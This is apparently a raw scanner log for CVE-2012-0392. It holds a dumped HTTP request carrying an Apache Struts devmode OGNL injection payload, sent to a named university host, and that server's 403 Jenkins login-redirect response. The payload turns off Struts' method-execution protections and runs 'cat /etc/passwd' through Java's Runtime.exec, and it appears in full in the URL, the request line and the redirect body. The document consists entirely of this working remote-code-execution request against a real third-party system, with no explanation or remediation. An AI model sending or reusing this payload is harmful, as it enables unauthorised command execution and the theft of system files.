[CVE-2012-0392] Dumped HTTP request for https://pipeline.eresearch.unimelb.edu.au/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))


GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1
Host: pipeline.eresearch.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2012-0392] Dumped HTTP response https://pipeline.eresearch.unimelb.edu.au/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))

HTTP/1.1 403 Forbidden
Connection: close
Content-Type: text/html;charset=utf-8
Date: Wed, 06 Aug 2025 15:18:12 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Jetty(12.0.22)
Set-Cookie: JSESSIONID.f9da2665=node0ydizfbarauiq17wo4f83smlwe2931.node0; Path=/; Secure; HttpOnly; SameSite=Lax
Strict-Transport-Security: max-age=63072000
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Hudson: 1.395
X-Jenkins: 2.516.1
X-Jenkins-Session: 529aec02

<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2Fdevmode.action%3Fdebug%3Dcommand%26expression%3D%28%2523_memberAccess%5B%2522allowStaticMethodAccess%2522%5D%253Dtrue%252C%2523foo%253Dnew%2520java.lang.Boolean%28%2522false%2522%29%2520%252C%2523context%5B%2522xwork.MethodAccessor.denyMethodExecution%2522%5D%253D%2523foo%252C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%2527cat%2520%2Fetc%2Fpasswd%2527%29.getInputStream%28%29%29%29'/><script id='redirect' data-redirect-url='/login?from=%2Fdevmode.action%3Fdebug%3Dcommand%26expression%3D%28%2523_memberAccess%5B%2522allowStaticMethodAccess%2522%5D%253Dtrue%252C%2523foo%253Dnew%2520java.lang.Boolean%28%2522false%2522%29%2520%252C%2523context%5B%2522xwork.MethodAccessor.denyMethodExecution%2522%5D%253D%2523foo%252C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%2527cat%2520%2Fetc%2Fpasswd%2527%29.getInputStream%28%29%29%29' src='/static/529aec02/scripts/redirect.js'></script></head><body style='background-color:white; color:white;'>
Authentication required
<!--
-->

</body></html>                                                                                                                                                                                                                                                                                                            
